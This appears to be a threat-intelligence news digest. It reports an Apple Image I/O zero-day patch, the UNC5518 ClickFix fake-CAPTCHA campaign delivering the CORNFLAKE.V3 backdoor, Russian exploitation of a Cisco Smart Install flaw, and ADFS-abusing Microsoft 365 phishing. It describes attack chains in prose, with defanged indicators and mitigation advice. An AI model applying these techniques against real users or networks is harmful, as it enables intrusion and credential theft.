Apple Patches CVE-2025-43300 Zero-Day Exploited in Sophisticated Attacks
Apple has released emergency updates to address CVE-2025-43300, a zero-day vulnerability in the Image I/O framework that has been actively exploited in what Apple calls “extremely sophisticated” attacks. The flaw stems from an out-of-bounds write weakness, which can occur when maliciously crafted image files cause the program to write data outside of the allocated memory buffer. This can result in memory corruption, system crashes, or remote code execution, depending on how the flaw is leveraged. Apple has rolled out fixes across its ecosystem, including iOS 18.6.2, iPadOS 18.6.2 and 17.7.10, and macOS Sequoia 15.6.1, Sonoma 14.7.8, and Ventura 13.7.8. While Apple confirmed exploitation in targeted campaigns, it has not released specifics on the threat actors or attack methods, reflecting the company’s caution in disclosing details that could aid replication by other adversaries. The vulnerability affects a broad range of devices, including the iPhone XS and later, numerous iPad models spanning both Pro and consumer lines, and Macs running the three latest macOS versions. This discovery marks Apple’s sixth zero-day fix in 2025, following earlier vulnerabilities patched in January, February, March, and April, continuing a trend of high-value targeting of Apple environments. In 2024, the company had already addressed six other exploited zero-days, underscoring the sustained interest in compromising Apple platforms for espionage or financial motives. Although current exploitation appears limited to high-value targets, Apple urges all users to install updates immediately to prevent potential broader exploitation. The fix implements enhanced bounds checking to block out-of-bounds writes, closing the attack vector and strengthening memory safety protections across Apple devices.
Update: UNC5518 Uses Fake CAPTCHA Pages to Deliver CORNFLAKE[.]V3 Backdoor
Threat actor UNC5518 has been exploiting legitimate websites by injecting ClickFix lures, which appear as fake CAPTCHA verification pages. These malicious overlays deceive users into executing obfuscated PowerShell commands copied to the clipboard through JavaScript, initiating multi-stage infection chains. The initial intrusion grants access-as-a-service, with UNC5518 handing off control to partners including UNC5774, who deploy the advanced CORNFLAKE[.]V3 backdoor. This version introduces persistence via registry Run keys, HTTP-based C2 channels with XOR-encoded traffic, and payload versatility that includes executables, DLLs, JavaScript, and batch scripts. To evade detection, the malware sideloads legitimate Node[.]js or PHP runtimes into %APPDATA% for execution, while employing anti-VM checks to avoid sandbox environments. These features highlight a deliberate evolution from earlier CORNFLAKE variants that lacked persistence and relied on simpler downloaders. Once active, CORNFLAKE[.]V3 executes extensive reconnaissance by leveraging system commands including systeminfo, tasklist, and arp, alongside Active Directory enumeration to map domain trusts, identify administrators, and support credential theft through Kerberoasting. Newer variants incorporate Cloudflare Tunnels to mask C2 communications, disguise malicious DLLs as benign file types, and automate persistence with novel commands for heartbeat and autorun functions. The campaign has also deployed secondary payload named WINDYTWIST[.]SEA, a resilient implant with reverse shell capabilities and multiple fallback C2 servers, underscores the layered nature of these operations. Observed process chains reveal explorer[.]exe spawning PowerShell, which in turn executes node.exe or php[.]exe, eventually loading disguised DLLs through rundll32[.]exe. To counter this threat, organizations should restrict execution of scripts from user directories, disable or limit the Windows Run dialog, enforce logging of abnormal PowerShell activity, and monitor outbound connections to Node[.]js and PHP distribution sources to identify suspicious activity at an early stage.
FBI Warns of Russian Exploitation of CVE-2018-0171 in Cisco Devices
The FBI has issued a heightened alert regarding Russian state-backed hackers linked to the FSB’s Center 16 unit, known as Berserk Bear (also tracked as Blue Kraken, Crouching Yeti, Dragonfly, and Koala Team). These actors are actively exploiting a seven-year-old vulnerability, CVE-2018-0171, in Cisco devices running IOS and IOS XE software. The flaw resides in Cisco’s Smart Install protocol, a feature often left enabled in enterprise and critical infrastructure environments for simplified device management. Exploitation enables unauthenticated attackers to reload devices remotely, induce denial-of-service (DoS) conditions, or even execute arbitrary code. The FBI reports that Berserk Bear has exploited this flaw to collect and modify configuration files from thousands of devices associated with U.S. critical infrastructure, thereby granting them unauthorized access to networks of strategic value. Their targeting indicates a strong interest in industrial control system (ICS) protocols and applications, underscoring the risk of operational disruption. Cisco Talos further warns that this campaign extends far beyond the U.S., impacting telecommunications, higher education, and manufacturing organizations across North America, Europe, Asia, and Africa. The threat group has deployed custom SNMP-based tooling for persistence and evasion, while in some cases using legacy implants, including SYNful Knock, first uncovered in 2015, to maintain long-term footholds. Cisco stresses that although Berserk Bear is currently the most visible actor exploiting CVE-2018-0171, other state-sponsored adversaries are likely conducting similar campaigns, raising the global risk level. Because Smart Install has been abused consistently since at least 2021, organizations that remain unpatched are at significant risk of compromise. To mitigate, administrators should apply the latest Cisco patches immediately, disable Smart Install where it is not required, and monitor for unauthorized configuration changes or anomalous management traffic that could signal ongoing exploitation.
Researchers Expose ADFS-Abusing Phishing Campaign Targeting Microsoft 365
Researchers at Push Security have identified a phishing campaign that exploits Microsoft’s Active Directory Federation Services (ADFS) to facilitate credential theft in Microsoft 365 environments. The campaign leverages malvertising in Google search results, where users searching for “Office 365” or mistyped variants are presented with sponsored ads crafted to appear authentic. These ads contain Google tracking parameters and route victims through a redirect chain that ultimately leads to a reverse-proxy phishing site capable of intercepting sessions and bypassing multi-factor authentication. The phishing kit is a standard Attacker-in-the-Middle implementation, but the delivery chain introduces a novel abuse of Microsoft’s redirect mechanisms. Adversaries establish malicious Microsoft tenants with attacker-controlled ADFS servers, inserting fake domains. To strengthen credibility, these domains are hosted with AI-generated content, fabricated author profiles, and blog-style pages, preventing immediate domain reputation blocking and providing cover during surface-level inspections. Push Security’s analysis revealed that these redirects function as open redirect abuse, originating from login.microsoftonline[.]com before diverting to the attacker infrastructure. This manipulation lends legitimacy to the phishing flow and complicates URL-based detection, particularly in environments that rely on domain categorization. Evidence collection showed that some tenants routed victims to full attacker-injected credential capture points. To counter these tactics, defenders are advised to monitor proxy logs for anomalous ADFS redirects containing /adfs/ls/, with emphasis on destinations outside trusted tenants. Additional mitigations include blocking malvertising channels through enterprise ad filters, enabling enhanced threat intelligence ingestion for emergent redirect domains, and correlating endpoint telemetry with browser activity to detect Attacker-in-the-Middle patterns.
